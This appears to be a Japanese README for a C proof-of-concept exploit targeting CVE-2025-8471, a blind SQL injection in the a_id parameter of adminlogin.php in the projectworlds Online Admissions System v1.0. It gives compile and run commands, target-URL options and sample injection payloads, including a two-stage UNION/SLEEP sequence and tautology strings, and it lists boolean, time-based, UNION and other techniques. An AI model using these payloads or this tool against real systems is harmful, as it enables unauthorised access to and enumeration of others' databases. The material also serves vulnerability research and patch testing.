
projectworlds Online Admissions System v1.0 において SQL インジェクションを悪用する
作者: Byte Reaper
CVE: CVE-2025-8471
脆弱性: “projectworlds Online Admission System v1.0” における SQLインジェクション
説明:
adminlogin.php?a_id= にブラインド SQLインジェクションが存在します。このPoCは、2段階 (INSERT … UNION SELECT …、SLEEP()、SELECT code …) と「ディープインジェクション」文字列の両方を含むさまざまなペイロードを送信し、応答長の違いを利用して問題を検出・列挙します。
libcurl と argparse がインストールされていることを確認します(例:Debian/Ubuntu では sudo apt-get install libcurl4-openssl-dev)。
コンパイル:
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u <TARGET_BASE_URL> [-c cookies.txt] [-v]
-u, --url — Base URL of the target, e.g. http://vulnsite.com
-c, --cookies — (Optional) path to a cookies file to maintain session
-v, --verbose — Enable verbose libcurl output and full response dumps
./exploit -u http:// -v
これにより以下が実行されます:
テストされたペイロード: 2段階
INSERT INTO stages (id,code) VALUES (3, 'UNION SELECT NULL --');
SELECT SLEEP(2);
SELECT code FROM stages WHERE id = 3;
ディープインジェクション
'//OR//1=1--, '//OR//'a'='a'--, …
ブール型、時間ベース、UNION、サブストリング、ORDER BY、LIKE、EXISTS、コメントスタイルのインジェクションを含みます。
すべてのペイロードは、配信前に curl_easy_escape によってURLエンコードされます。
MITライセンス